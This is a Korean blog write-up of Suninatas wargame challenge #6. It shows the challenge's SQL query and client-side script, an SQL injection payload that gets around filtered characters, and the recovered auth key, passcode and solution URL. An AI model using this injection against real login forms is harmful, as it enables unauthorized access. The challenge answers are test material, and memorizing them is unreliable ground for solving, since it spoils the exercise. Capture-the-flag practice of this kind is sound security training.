본문 바로가기

wargame/Suninatas

써니나타스 #6번 풀이

반응형

게시판이 나오네요

더보기
select szPwd from T_Web13 where nIdx = '3' and szPwd = ' 입력값' ' or ' true 
<script>
    var cont = document.pwd_chk;

    function fnChk_pwd() {
        if (cont.passwd.value == "") {
            alert("비밀번호를 입력하세요!");
            cont.passwd.focus();
        } else {
            cont.action = "secret.asp";
            cont.submit();
        }
    }
</script>

view.asp?num=1


var cont = document.pwd_chk;

    function fnChk_pwd() {
        if (cont.passwd.value == "") {
            alert("비밀번호를 입력하세요!");
            cont.passwd.focus();
        } else {
            cont.action = "view.asp?num=3";
            cont.submit();
        }
    }

답
	=, #이 필터링 됨

	' or '1' < '2' --
    대충 이걸로 우회해주면
	
    키가 나오네요
	auth_key is suninatastopofworld!
	
	wkdrnlwnd
	
    인증 이 두개로 때려도 안되길래 뭔 문제인 가 했더니
    
    글 중간에 키 찾으라는 말이 있네요...;;;
	Congratulation!!\n\auth_key is suninatastopofworld!\n\nNow, you can read this article.
	
	view.asp?idx=3&num=3&passcode=wkdrnlwnd
	
	소스보면 메소드로 답 있다. 간단쓰

'wargame > Suninatas' 카테고리의 다른 글

써니나타스 #8 풀이  (0) 2020.08.02
써니나타스 #7번 풀이  (0) 2020.08.02
써니나타스 #5번 풀이  (0) 2020.08.02
써니나타스 #4번 풀이  (0) 2020.08.02
써니나타스 #3번 풀이  (0) 2020.08.02